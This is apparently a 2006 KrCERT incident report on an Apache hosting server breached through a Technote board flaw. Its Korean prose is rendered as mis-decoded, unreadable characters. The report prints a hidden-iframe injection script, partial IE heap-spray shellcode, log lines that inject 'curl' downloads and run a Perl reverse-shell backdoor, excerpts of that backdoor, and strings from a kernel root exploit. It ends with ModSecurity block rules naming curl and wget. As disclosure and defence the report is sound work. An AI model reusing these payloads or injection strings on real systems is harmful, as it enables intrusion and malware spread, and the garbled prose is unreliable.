[ÀÚ·á: Çѱ¹Á¤º¸º¸È£ÁøÈï¿ø(KISA)]
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 2 -
1. °³¿ä
Çѱ¹Á¤º¸º¸È£ÁøÈï¿ø ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ´Â ÀÚü °³¹ßÇÑ ¾Ç¼ºÄÚµå Àº´Ð»çÀÌÆ® ŽÁö ÇÁ
·Î±×·¥(MCFinder, Malicious Code Finder)À» Ȱ¿ëÇÏ¿© ȨÆäÀÌÁö ÇØÅ· ÈÄ ¾Ç¼ºÄڵ尡 »ðÀԵǾî Ȩ
ÆäÀÌÁö ¹æ¹®ÀÚµéÀ» °¨¿°½Ãų ¼ö ÀÖ´Â »çÀÌÆ®¸¦ ŽÁöÇÏ¿© Á¶Ä¡Çϰí ÀÖ´Ù.
2006³â 1¿ù~5¿ù±îÁö ¾à 2õ¿©°³ÀÇ ¾Ç¼ºÄÚµå À¯Æ÷Áö ¹× °æÀ¯Áö »çÀÌÆ®µéÀ» ¹ß°ßÇÏ¿© Á¶Ä¡ÇÏ¿´´Â
µ¥, ÀÌ Áß 70¿©°³ÀÇ À¥¼¹ö´Â Apache À¥¼¹ö¿´´Ù.
MCFinder¸¦ ÅëÇØ ¾Ç¼ºÄڵ尡 À¯Æ÷µÇ°í ÀÖ´Â H ±â¾÷ÀÇ Apache À¥¼¹ö¸¦ ºÐ¼®ÇÏ¿´´Ù.
ºÐ¼®°á°ú ÇØ´ç ½Ã½ºÅÛÀº ¹Ì±¹À¸·ÎºÎÅÍ °ø°ÝÀ» ¹Þ¾ÒÀ¸¸ç, Å×Å©³ëÆ®ÀÇ Ãë¾àÁ¡ÀÌ °ø°Ý¿¡ ¾Ç¿ëµÇ¾ú´Ù.
ÇØ´ç À¥¼¹ö´Â 350¿©°³ÀÇ À¥»çÀÌÆ®°¡ ¿î¿µµÇ´Â À¥È£½ºÆÃ ¼¹ö¿´´Âµ¥, À̵éÀÇ ¸ðµç index ÆÄÀÏ
(5,000¿©°³)¿¡ ¾Ç¼ºÄڵ尡 »ðÀԵǾî ÀÖ¾ú´Ù.
ÀÌ´Â ÀϹÝÀûÀÎ ¾Ç¼ºÄÚµå À¯Æ÷Áö ¶Ç´Â °æ¿ìÁö »çÀÌÆ®µéÀÌ SQL Injection Ãë¾àÁ¡¿¡ ÀÇÇØ °ø°Ý¹Þ
°í, ÃʱâÈ¸é ¶Ç´Â Ç÷¡½¬ µî ƯÁ¤ÇÑ °÷¿¡¸¸ ¾Ç¼ºÄڵ带 ¼û°ÜµÐ °Í°ú´Â ´ëÁ¶ÀûÀÎ °ÍÀ¸·Î, ±¹³» °ø
°³ °Ô½ÃÆÇÀÎ Å×Å©³ëÆ®ÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¿© À¥ È£½ºÆÃ ¼¹ö¿¡¼ ¿î¿µµÇ°í ÀÖ´Â ¸ðµç »çÀÌÆ®ÀÇ ¸ð
µç index ÆÄÀÏ¿¡ ¾Ç¼ºÄڵ带 ¼û°å´Ù´Â Á¡¿¡¼ ÁÖ¸ñÇÒ Çʿ䰡 ÀÖ´Ù.
¶ÇÇÑ, º» »ç°í¿¡¼ ±¹³»¿ÜÀÇ ¸¹Àº ¼¹öµéÀÌ ¾Ç¼ºÄÚµå ´Ù¿î·Îµå µî ÇØÅ· °úÁ¤¿¡¼ ÀÌ¿ëµÇ°í ÀÖ¾ú
´Âµ¥, ±¹³»ÀÇ ¹æÄ¡µÈ ÈÞ¸é ȨÆäÀÌÁöµµ ÇØÅ·´çÇÑ ÈÄ Reverse ConnectionÀ» À§ÇÑ ¿ëµµ·Î »ç¿ëµÇ¾ú
´Ù. Á¤º¸Åë½ÅºÎ¿Í Çѱ¹Á¤º¸º¸È£ÁøÈï¿ø¿¡¼ Áö³ 6¿ù ÈÞ¸é ȨÆäÀÌÁö Á¤¸® Ä·ÆäÀÎÀ» ½Ç½ÃÇÏ¿´´Âµ¥,
º» »ç°ÇÀ» ÅëÇØ ÈÞ¸é ȨÆäÀÌÁöÀÇ À§Ç輺À» ´À³¥ ¼ö ÀÖ¾ú´Ù.
2. ¾Ç¼ºÄÚµå À¯Æ÷ À¥»çÀÌÆ® ºÐ¼®
¡à ȨÆäÀÌÁö Ãʱâȸ鿡 ¾Ç¼ºÄÚµå »ðÀÔ
MCFinder´Â ±¹³» H ±â¾÷ÀÇ È¨ÆäÀÌÁö¿¡¼ ´ÙÀ½°ú °°Àº ¾Ç¼ºÄڵ带 ŽÁöÇÏ¿´´Ù.
KrCERT-IN-2006-03 http://www.krcert.or.kr
¾ÆÆÄÄ¡ À¥¼¹ö¿¡¼ ¾Ç¼ºÄÚµå À¯Æ÷ »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 3 -
¾Ç¼ºÄÚµå´Â ŽÁö¸¦ ¾î·Æ°Ô Çϱâ À§ÇØ ÀÎÄÚµùµÇ¾î ÀÖ´Â »óÅ¿´À¸¸ç, À̸¦ µðÄÚµùÇÏ¸é ´ÙÀ½°ú °°
ÀÌ IFRAME ű׸¦ ÀÌ¿ëÇÏ¿© ƯÁ¤ »çÀÌÆ®·Î ¿¬°áÀ» ½Ã۰í ÀÖ¾ú´Ù.
<script language=javascript>document.write(unescape('<IFRAME SRC="http://xxx.info/out.php?s_id=1"
WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME><IFRAME
SRC="http://xxxproxies.com/out.php?s_id=1" WIDTH=0 BORDER=0 HEIGHT=0
style="display:none"></IFRAME>'))</script>
IFRAME¿¡¼ ¸µÅ©Çϰí ÀÖ´Â µÎ °³ÀÇ »çÀÌÆ® Áß xxx.info´Â ³ë¸£¿þÀÌ¿¡ ÇÒ´çµÈ IP ÁÖ¼Ò¿´À¸¸ç,
³ª¸ÓÁö ÇÑ °³ÀÇ »çÀÌÆ®(xxxproxies.com)Àº ºÐ¼® ´ç½Ã IP·Î resolutionÀÌ µÇÁö ¾Ê¾Ò´Ù.
¡à 350°³ À¥»çÀÌÆ® 5,000¿©°³ À¥ ÆäÀÌÁö¿¡ ¾Ç¼ºÄÚµå »ðÀÔ
ÇØ´ç ÇÇÇØ À¥»çÀÌÆ®ÀÇ ºÐ¼®À» À§ÇØ À¥È£½ºÆÃ ¼¹ö ºÐ¼®À» ÁøÇàÇÏ¿´´Âµ¥, ÇÇÇØ À¥»çÀÌÆ® »Ó¸¸ ¾Æ´Ï¶ó ÇØ
´ç ¼¹ö ³»¿¡ ÀÖ´Â 350°³ À¥»çÀÌÆ®ÀÇ ¸ðµç index ÆÄÀÏÀÌ ¾Ç¼ºÄڵ忡 °¨¿°µÇ¾î ÀÖ¾ú´Ù.
[root@linux conf]# grep "<VirtualHost" httpd.conf | grep -v "#" | wc -l
350
[root@linux home]# grep "write(unescape('%3c%49%" -R . |wc -l
5,164
¶ÇÇÑ, ´ÙÀ½°ú °°ÀÌ ÀÎÅÍ³Ý ÀͽºÇ÷η¯ÀÇ ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡À» °ø°ÝÇÏ´Â °ÍÀ¸·Î ÃßÁ¤µÇ´Â
4digitÀ¸·Î encodingµÈ ÀÚ¹Ù½ºÅ©¸³Æ® Äڵ嵵 ´Ù¼öÀÇ À¥ ÆäÀÌÁö¿¡ »ðÀԵǾî ÀÖ¾ú´Ù.
<scRIPT language="javascript">
shellcode =
unescape("%u4343%u4343"+"%u0eeb%u4b5b%uc933%uf7b1%u3480%uee0b%ufae2%u05eb%uede
<Áß°£»ý·«>
6%uc182%u9c9a%u8bc0%u8b96%u00ee");
KrCERT-IN-2006-03 http://www.krcert.or.kr
¾ÆÆÄÄ¡ À¥¼¹ö¿¡¼ ¾Ç¼ºÄÚµå À¯Æ÷ »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 4 -
bigblock = unescape("%u0D0D%u0D0D");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
<Áß°£»ý·«>
memory = new Array();
for (i=0;i<750;i++) memory[i] = block + shellcode;
</scRIPT>
¡à ¾Ç¼ºÄÚµå »ðÀÔµÈ À¥ ÆäÀÌÁö ¹æ¹®½Ã ¾Ç¼º Bot °¨¿°
ÀÏ¹Ý ÀÎÅÍ³Ý »ç¿ëÀÚ°¡ ÀÚ¹Ù½ºÅ©¸³Æ® Äڵ尡 »ðÀÔµÈ À¥ ÆäÀÌÁö¿¡ ¹æ¹®ÇÏ¿´À» °æ¿ì ´ÙÀ½°ú °°ÀÌ
C:WinNTsystem32 Æú´õ ¾Æ·¡¿¡ a.exe¶ó´Â ÆÄÀÏÀÌ »ý¼ºµÈ´Ù.
¶ÇÇÑ, ·¹Áö½ºÆ®¸®¿¡ ´ÙÀ½°ú °°ÀÌ ¸î °³ÀÇ ·¹Áö½ºÆ®¸® Ű¿¡ msgfix.exe¶ó´Â °ªÀ» ³Ö¾î ½Ã½ºÅÛ ºÎÆÃ ÈÄ¿¡
µµ Àç °¡µ¿µÉ ¼ö ÀÖµµ·Ï Çϰí ÀÖ´Ù.
a.exe ÇÁ·Î±×·¥Àº ÇÁ¶û½º¿¡ ÇÒ´çµÈ IPÁÖ¼ÒÀÎ xxx.xxx.206.93¿¡ 6667Æ÷Æ®·Î ¿¬°áµÇ´Â °ÍÀ» º¼ ¼ö ÀÖ¾ú´Ù.
KrCERT-IN-2006-03 http://www.krcert.or.kr
¾ÆÆÄÄ¡ À¥¼¹ö¿¡¼ ¾Ç¼ºÄÚµå À¯Æ÷ »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 5 -
a.exe ÇÁ·Î±×·¥Àº ¹ÙÀÌ·¯½º ¹é½Å¿¡¼ ¹éµµ¾î ±â´ÉÀ» °¡Áø SDBotÀÇ º¯Á¾À¸·Î Áø´ÜÇϰí ÀÖ´Ù.
Áï, ȨÆäÀÌÁö¿¡ »ðÀÔµÈ ¾Ç¼ºÄÚµå´Â ȨÆäÀÌÁö ¹æ¹®ÀÚµéÀ» IE Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¿© °ø°ÝÇÑ ÈÄ, ƯÁ¤
¾Ç¼º Bot C&C(¸í·É․Á¦¾î ¼¹ö)·Î ¿¬°áµÇ°Ô ÇÏ¿© ¿ø°ÝÁ¦¾îÇÑ´Ù.
¡à À¥ ·Î±× ºÐ¼® °á°ú
ÇÇÇØ¼¹öÀÇ À¥·Î±× ºÐ¼® °á°ú 6¿ù 17Àϰú 28ÀÏ ¾çÀÏ¿¡ °ÉÃÄ ¹Ì±¹¿¡ ÇÒ´çµÈ IP·ÎºÎÅÍ Å×Å©³ëÆ®
Ãë¾àÁ¡¿¡ ´ëÇÑ °ø°ÝÀÌ ¼º°øÇÑ °ÍÀ» ¹ß°ßÇÒ ¼ö ÀÖ¾ú´Ù. °ø°Ý °³¿ä´Â ´ÙÀ½°ú °°´Ù.
o °ø°Ý ½ÃÁ¡ : 2006. 6. 17ÀÏ, 28ÀÏ
o °ø°Ý IP : xxx.xxx.201.79(¹Ì±¹ O ´ëÇÐ), xxx.xxx.103.4(¹Ì±¹ R ´ëÇÐ)
o °ø°Ý ¹æ¹ý : Å×Å©³ëÆ® CGI ÇÁ·Î±×·¥ÀÇ ÆÄ¶ó¹ÌÅÍ ÀԷ°ª °ËÁõ ¿À·ù ¾Ç¿ë
- Å×Å©³ëÆ®ÀÇ CGI ÇÁ·Î±×·¥ÀÌ ÆÄ¶ó¹ÌÅÍ ÀԷ°ª¿¡ ´ëÇÑ °ËÁõÀ» ÇÏÁö ¾Ê¾Æ, ÆÄÀÌÇÁ(|) ¹®ÀÚ ÀÌÈÄ
¿¡ ³ª¿À´Â ½© ¸í·ÉÀ» ½ÇÇàÇÏ´Â Ãë¾àÁ¡À» ¾Ç¿ëÇÏ¿´À½
o ƯÀÌ»çÇ× : curl ¸í·ÉÀ» »ç¿ëÇÑ ÇØÅ· ÇÁ·Î±×·¥ ¼³Ä¡
- ȨÆäÀÌÁö º¯Á¶ µî ÀϹÝÀûÀ¸·Î ¸®´ª½º ¼¹öÀÇ ÇØÅ·½Ã ÇØÅ· ÇÁ·Î±×·¥À» ¼³Ä¡Çϱâ À§ÇØ wget ¸í
·ÉÀ» ÈçÈ÷ »ç¿ëÇϰí ÀÖÀ¸³ª, ÀÌ »ç°ÇÀÇ °æ¿ì curl ¸í·ÉÀ» »ç¿ëÇÏ¿´À½
- curl ¸í·ÉÀ» ÀÌ¿ëÇÏ¿© /tmp µð·ºÅ丮¿¡ cub ¶ó´Â Perl ½ºÅ©¸³Æ® ÆÄÀÏÀ» »ý¼ºÇϰí À̸¦ ½ÇÇàÇÏ¿´À½
¡Ø curl ¸í·ÉÀº HTTP, HTTPS, FTP µîÀÇ ÇÁ·ÎÅäÄÝÀ» ÀÌ¿ëÇÏ¿© ¿ø°ÝÁö ¼¹ö¿Í ÆÄÀÏÀ» ¼Û¼ö½ÅÇÒ ¼ö ÀÖ´Â ¸í·É¾î
access_log.1:xxx.xxx.201.79 - - [28/Jun/2006:22:37:37 +0900] "GET
/cgi-bin/technote/main.cgi?down_num=1078999704&board=INT_BOARD&command=down_loa
d&filename=index.htm|cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20tmp;curl
%20xxx.jino-net.ru%20-o%20cbd;perl%20cbd%20xxx.xxx.222.21| HTTP/1.1" 200 0
...
access_log.2:xxx.xxx.103.4 - - [17/Jun/2006:11:28:31 +0900] "GET
/cgi-bin/technote/main.cgi?down_num=1078999704&board=INT_BOARD&command=down_loa
d&filename=index.htm|cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20tmp;curl
%20xxx.jino-net.ru%20-o%20cbd;perl%20cbd%20xxx.xxx.222.21| HTTP/1.1" 200 0
¡à /tmp µð·ºÅ丮¿¡ ¼³Ä¡µÈ ÇØÅ· ÇÁ·Î±×·¥
ÀϹÝÀûÀ¸·Î °ø°ÝÀÚµéÀÌ ÇØÅ· ÇÁ·Î±×·¥ ¼³Ä¡ µð·ºÅ丮·Î °¡Àå ¼±È£ÇÏ´Â /tmp ¿¡ ¿ª½Ã ÇØÅ· °ü
·Ã ÇÁ·Î±×·¥µéÀÌ ¼³Ä¡µÇ¾î ÀÖ¾ú´Ù.
[root@linux tmp]# ls - alc
-rwxr-xr-x 1 nobody nobody 452101 Jun 28 22:37 brk2
-rw-rw-rw- 1 nobody nobody 546 Jun 28 22:32 cbd
KrCERT-IN-2006-03 http://www.krcert.or.kr
¾ÆÆÄÄ¡ À¥¼¹ö¿¡¼ ¾Ç¼ºÄÚµå À¯Æ÷ »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 6 -
cbd ½ºÅ©¸³Æ®´Â ƯÁ¤ »çÀÌÆ®·Î Reverse ConnectionÀ» ¸Î±â À§ÇÑ Perl ½ºÅ©¸³Æ®·Î º¸¿©Áø´Ù.
[root@linux tmp]# cat cbd
#!/usr/bin/perl
$ARGC=@ARGV;
$shell = '/bin/sh';
print "
-+++++cbd by doberman+++++-
";
<Áß°£ »ý·«>
connect(SOCKET, sockaddr_in($ARGV[1] || '3333', inet_aton($ARGV[0] || 'xxx.xxx.222.21')))
or die print "
unable connect to host bad port?
";
<Áß°£ »ý·«>
system("pwd;id;uname -a;cat /etc/*release;cat /proc/version");
system($shell);
ÇØÅ· ÇÇÇØ ¼¹ö´Â ¿ø°Ý¿¡¼ÀÇ ºÒ¹ý telnet Á¢¼ÓÀ» Â÷´ÜÇϱâ À§ÇØ ¹æÈº®À» ÀÌ¿ëÇÏ¿© ƯÁ¤ IP¿¡
¼¸¸ Á¢¼ÓÇÒ ¼ö ÀÖµµ·Ï ¼³Á¤Çϰí ÀÖ¾ú´Âµ¥, °ø°ÝÀÚ´Â À̸¦ ¿ìȸÇϱâ À§ÇØ Reverse ConnectionÀ»
ÇÏ¿´´Ù.
cbd ½ºÅ©¸³Æ®ÀÇ ³»¿ë Áß xxx.xxx.222.21´Â ±¹³» B±â¾÷ÀÌ ¾ÆÁ÷ Á¤½Ä ¿ÀÇÂÇÏÁö ¾ÊÀº »óÅ·Π¹æÄ¡
Çϰí ÀÖ¾ú´ø ÈÞ¸é ȨÆäÀÌÁö¿´´Ù. ÇØ´ç ¼¹ö´Â ¸®´ª½º ¾ÆÆÄÄ¡ À¥¼¹ö·Î ´Ù¼öÀÇ Æ÷Æ®°¡ ¿·ÁÁ® ÀÖ¾î
º¸¾ÈÀÌ Ãë¾àÇÑ »óÅ¿´°í, ÀÌ¹Ì ÇØÅ·À» ´çÇÑ °ÍÀ¸·Î º¸¿©Áø´Ù. ´ÙÀ½ ȸéÀº B±â¾÷ÀÇ È¨ÆäÀÌÁöÀÌ´Ù.
ÇØ´ç ¼¹ö¿¡´Â 22¹ø Æ÷Æ®¿Í 3332Æ÷Æ®¿¡¼ °¢°¢ SSH ¼ºñ½º¸¦ Çϰí ÀÖ¾ú´Âµ¥, 3332 Æ÷Æ®°¡ ¹éµµ¾î¿ë
À¸·Î »ç¿ëµÇ°í ÀÖ´Â °ÍÀ¸·Î º¸¿©Áø´Ù. ¾Õ¼ E À¥È£½ºÆÃ ¼¹ö¿¡¼ ¹ß°ßµÈ Perl ½ºÅ©¸³Æ®¿¡¼´Â 3333¹ø
Æ÷Æ®·Î Á¢¼ÓÀ» Çϵµ·Ï µÇ¾î ÀÖ¾ú´Âµ¥, °ø°ÝÀÚ°¡ ÁÖ±âÀûÀ¸·Î Æ÷Æ®¸¦ º¯°æÇϰí ÀÖ´Â °ÍÀ¸·Î »ý°¢µÈ´Ù.
KrCERT-IN-2006-03 http://www.krcert.or.kr
¾ÆÆÄÄ¡ À¥¼¹ö¿¡¼ ¾Ç¼ºÄÚµå À¯Æ÷ »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 7 -
22 SSH Remote Login Protocol
|___ SSH-1.99-OpenSSH_3.1p1.
3332
|___ SSH-1.5-2.0.13.
ÇÇÇØ À¥È£½ºÆÃ ¼¹öÀÇ Èֹ߼º Á¤º¸ ºÐ¼®½Ã ³×Æ®¿öÅ© ¿¬°á»óÅ¿¡ B ±â¾÷ÀÇ 3333¹ø Æ÷Æ®·Î
Reverse ConnectionÇÑ ÈçÀûÀÌ ³²¾Æ ÀÖ¾ú´Ù.
[root@linux root]# netstat -nap
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 8 0 xxx.xxx.20.63:45672 xxx.xxx.222.21:3333 CLOSE_WAIT 26587/
ÇÇÇØ À¥È£½ºÆÃ ¼¹öÀÇ /tmp µð·ºÅ丮¿¡¼ ¹ß°ßµÈ ¶Ç ´Ù¸¥ ÇØÅ· ÇÁ·Î±×·¥(brk2)´Â ¹ÙÀ̳ʸ® ÆÄÀÏ·Î
¸®´ª½º Ä¿³ÎÀÇ º¸¾È Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¿© root ±ÇÇÑÀ» ȹµæÇϱâ À§ÇÑ ÇÁ·Î±×·¥À¸·Î º¸¿©Áø´Ù.
[root@linux tmp]# strings brk2
<Áß°£»ý·«>
[-] %s: %s
[-] Unable to exit, entering neverending loop.
Kernel seems not to be vulnerable
double allocation
Unable to determine kernel address
Unable to set up LDT
Unable to change page protection
Invalid LDT entry
Unable to jump to call gate
/bin/sh
Unable to spawn shell
PATH=/usr/bin:/bin:/usr/sbin:/sbin
Unable to allocate memory
Unable to unmap stack
<ÀÌÇÏ »ý·«>
ÇÇÇØ¼¹ö´Â ¸®´ª½º Ä¿³Î ¹öÀüÀÌ 2.4.20À̾ú´Ù.
[root@linux root]# uname -a
Linux xxx.co.kr 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
¸®´ª½º Ä¿³Î ¹öÀü 2.4.20 ¹öÀü¿¡´Â ÀÏ¹Ý »ç¿ëÀÚ°¡ root ±ÇÇÑÀ» ȹµæÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡ µî ´Ù¾çÇÑ
Ãë¾àÁ¡ÀÌ Á¸ÀçÇÑ´Ù.
KrCERT-IN-2006-03 http://www.krcert.or.kr
¾ÆÆÄÄ¡ À¥¼¹ö¿¡¼ ¾Ç¼ºÄÚµå À¯Æ÷ »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 8 -
°á°úÀûÀ¸·Î Å×Å©³ëÆ®ÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¿© À¥¼¹ö ±ÇÇÑ(nobody)À¸·Î cbd ¹éµµ¾î·Î Reverse
ConnectionÀ» ¸ÎÀº ÈÄ, brk2 ÇØÅ· ÇÁ·Î±×·¥À¸·Î root ±ÇÇÑÀ» ȹµæÇÑ ÈÄ, ¸ðµç ȨÆäÀÌÁö¿¡ ¾Ç¼ºÄÚ
µå¸¦ »ðÀÔÇÑ °ÍÀ¸·Î ÃßÃøµÈ´Ù.
3. °á·Ð ¹× ´ëÃ¥
º» »ç°í´Â ±âÁ¸ »ç°í¿Í´Â ´Ù¸¥ ¸î °¡Áö Ư¡À» ¶ç°í ÀÖÀ¸¸ç, ´ÙÀ½°ú °°Àº ½Ã»çÁ¡À» ÁÖ°í ÀÖ´Ù.
ù°, °ø°³ °Ô½ÃÆÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÏ¿© ¾Ç¼ºÄڵ带 À¯Æ÷ÇÏ¿´´Ù.
±âÁ¸ÀÇ SQL Injection »Ó¸¸ ¾Æ´Ï¶ó °ø°³ °Ô½ÃÆÇÀÎ Å×Å©³ëÆ®ÀÇ º¸¾È Ãë¾àÁ¡µµ ¾Ç¼ºÄÚµå À¯Æ÷¿¡ ÀÌ
¿ëµÇ¾ú´Ù. ÀÌ´Â ±¹³»¿¡¼ °¡Àå ¸¹ÀÌ »ç¿ëµÇ°í ÀÖ´Â Á¦·Îº¸µåÀÇ Ãë¾àÁ¡À» ÀÌ¿ëÇÑ ¾Ç¼ºÄÚµå À¯Æ÷µµ
ÀÖÀ» ¼ö ÀÖÀ½À» ½Ã»çÇÑ´Ù.
µÑ°, À¥È£½ºÆÃ ¼ºñ½º¸¦ ¹Þ°í ÀÖ´Â Áß¼Ò±Ô¸ð À¥»çÀÌÆ®¸¦ ¾Ç¼ºÄÚµå À¯Æ÷¿¡ ÀÌ¿ëÇÏ¿´´Ù.
±âÁ¸Àº ÀÏ¹Ý »ç¿ëÀÚµéÀÇ ¹æ¹®ÀÌ ¸¹Àº ´º½º »çÀÌÆ® µî ÁÖ·Î ´ë±Ô¸ð À¥»çÀÌÆ®µéÀÌ °ø°Ý ´ë»óÀÌ µÇ
¾úÀ¸³ª, À¥È£½ºÆÃ ¼ºñ½º¸¦ ¹Þ´Â Áß¼Ò±Ô¸ð À¥»çÀÌÆ® ¼ö¹é°³¿¡ ¾Ç¼ºÄڵ带 »ðÀÔÇÏ¿´´Ù. ¶ÇÇÑ, À¥È£
½ºÆÃ¾÷üµéÀÇ ¾ÆÆÄÄ¡ À¥¼¹ö´Â ȨÆäÀÌÁö º¯Á¶°¡ °¡Àå ´ëÇ¥ÀûÀÎ ÇÇÇØ¿´Áö¸¸, º¸´Ù ¹üÁËÀûÀÎ ¾Ç¼ºÄÚ
µå À¯Æ÷¿¡µµ ¾ÆÆÄÄ¡ À¥¼¹öµéÀÌ ¾Ç¿ëµÇ°í ÀÖÀ½¿¡ ÁÖ¸ñÇÒ Çʿ䰡 ÀÖ´Ù.
¼Â°, ±¹³» ÈÞ¸é ȨÆäÀÌÁö°¡ ÇØÅ·ÀÇ ¼÷ÁÖ ¿ªÇÒÀ» Çϰí ÀÖ¾ú´Ù.
À¥»çÀÌÆ® ¿ÀÇÂÀ» ÁغñÇϱâ À§ÇØ ¹æÄ¡µÇ¾ú´ø B±â¾÷ÀÇ È¨ÆäÀÌÁö°¡ Reverse ConnectionÀ» À§ÇÑ ¿ëµµ·Î
KrCERT-IN-2006-03 http://www.krcert.or.kr
¾ÆÆÄÄ¡ À¥¼¹ö¿¡¼ ¾Ç¼ºÄÚµå À¯Æ÷ »ç·Ê cert@krcert.or.kr
_______________________________________________________________________________________ _
__________________________________________________________________________________________
KISC
ÀÎÅͳÝÄ§ÇØ»ç°í´ëÀÀÁö¿ø¼¾ÅÍ - 9 -
»ç¿ëµÇ¾ú´Âµ¥, ¹æÄ¡µÈ ÈÞ¸é ȨÆäÀÌÁö°¡ ÇØÅ·¿¡ »ç¿ëµÈ »ç·Ê¶ó°í ÇÒ ¼ö ÀÖ´Ù. Áö³ 5¿ù ÀÎÅͳÝÄ§ÇØ
»ç°í´ëÀÀÁö¿ø¼¾ÅÍ¿¡¼ ½Ç½ÃÇÑ ÈÞ¸é ȨÆäÀÌÁö ½ÇÅÂÁ¶»ç¿¡¼ ÇØÅ·´çÇÑ È¨ÆäÀÌÁö°¡ Àüü ȨÆäÀÌÁö¿¡
ºñÇØ 2¹è Á¤µµ ¸¹ÀÌ ÈÞ¸é »óÅ¿´´Ù(Àüü ȨÆäÀÌÁö Áß ÈÞ¸é ȨÆäÀÌÁö ºñÀ²Àº 14.5%¿´À¸¸ç, ÇØÅ·´çÇÑ
ȨÆäÀÌÁö Áß ÈÞ¸é ȨÆäÀÌÁö ºñÀ²Àº 30%Á¤µµ¿´À½). Áï, ½ÇÅÂÁ¶»ç¸¦ ÅëÇØ ÈÞ¸é ȨÆäÀÌÁö´Â ÇØÅ·´çÇÒ
°¡´É¼ºµµ ³ôÀ½À» ¾Ë ¼ö ÀÖ¾úÀ¸¸ç, À̹ø »ç°í¿¡¼µµ ÈÞ¸é ȨÆäÀÌÁö°¡ ÇØÅ·¿¡ ¾Ç¿ëµÇ°í ÀÖ¾ú´Ù.
º» »ç°Ç¿¡ ´ëÇÑ º¸¾È ´ëÃ¥Àº ´ÙÀ½°ú °°´Ù.
ù°, Å×Å©³ëÆ®¿¡ ´ëÇÑ ÃֽŠº¸¾È ÆÐÄ¡¸¦ Àû¿ëÇÑ´Ù.
Å×Å©³ëÆ® ȨÆäÀÌÁö(http://www.technote.co.kr/)¿¡¼ 2006³â 2¿ù 22ÀÏ ¹èÆ÷ÇÑ ¡¸Å×Å©³ëÆ® PHP6¡¹
Á¤½Ä¹öÀüÀ» ¼³Ä¡ÇÑ´Ù.
µÑ°, ÃֽЏ®´ª½º Ä¿³Î·Î ÆÐÄ¡ÇÑ´Ù.
ÃÖ±Ù ¸®´ª½º Ä¿³ÎÀÇ Ãë¾àÁ¡À¸·Î ÀÎÇØ ·ÎÄà »ç¿ëÀÚ°¡ root ±ÇÇÑÀ» ȹµæÇÒ ¼ö ÀÖ´Â Ãë¾àÁ¡µéÀÌ ´Ù¼ö
Á¸ÀçÇÑ´Ù. µû¶ó¼ http://www.kernel.org/ ·ÎºÎÅÍ ÃÖ½ÅÀÇ ¸®´ª½º Ä¿³ÎÀ» ´Ù¿î·Îµå ¹Þ¾Æ ¼³Ä¡Çϵµ
·Ï ÇÑ´Ù.
¼Â°, Apache¿ë °ø°³ À¥¹æÈº® ModSecurity¸¦ ÀÌ¿ëÇÏ¿© º¸¾ÈÀ» °ÈÇÑ´Ù.
¾Æ·¡ ±â¼ú¹®¼¸¦ ÂüÁ¶ÇÏ¿© ModSecurity¸¦ ¼³Ä¡ÇÏ°í ¿î¿µÇÑ´Ù.
www.krcert.or.kr ¡æ º¸¾ÈÁ¤º¸ ¡æ ±â¼ú¹®¼ ¡æ ¡°ModSecurity¸¦ ÀÌ¿ëÇÑ ¾ÆÆÄÄ¡ À¥¼¹ö º¸¾È¡±
±Ý¹ø »ç°í¿Í °°ÀÌ URL ÆÄ¶ó¸ÞÅÍ ÀԷ°ª¿¡ curl ¸í·É µîÀ» »ç¿ëÇÑ °ø°ÝÀ» Â÷´ÜÇϱâ À§Çؼ ´ÙÀ½°ú
°°Àº ·êÀ» ModSecurity¿¡ Àû¿ëÇÒ ¼ö ÀÖ´Ù.
SecFilterSelective HTTP_User-Agent "(libwhisker|paros|wget|libwww|perl|curl|java)"
SecFilterSelective ARGS "<script"
SecFilterSelective ARGS "javascript:"
SecFilterSelective ARGS_VALUES ";[[:space:]]*(ls|id|pwd|wget|curl)"
SecFilterSelective ARGS_VALUES "^http:/"
³Ý°, ÀÏ¹Ý »ç¿ëÀÚÀÇ °æ¿ì ¹Ýµå½Ã ÃֽŠº¸¾È ÆÐÄ¡¸¦ À¯ÁöÇÑ´Ù.
º» »ç°í¿¡¼µµ ÀÏ¹Ý »ç¿ëÀÚµéÀÇ PC°¡ º¸¾ÈÆÐÄ¡µÇ¾î ÀÖÁö ¾ÊÀ» °æ¿ì ȨÆäÀÌÁö ¹æ¹®¸¸À¸·Î ¾Ç¼º
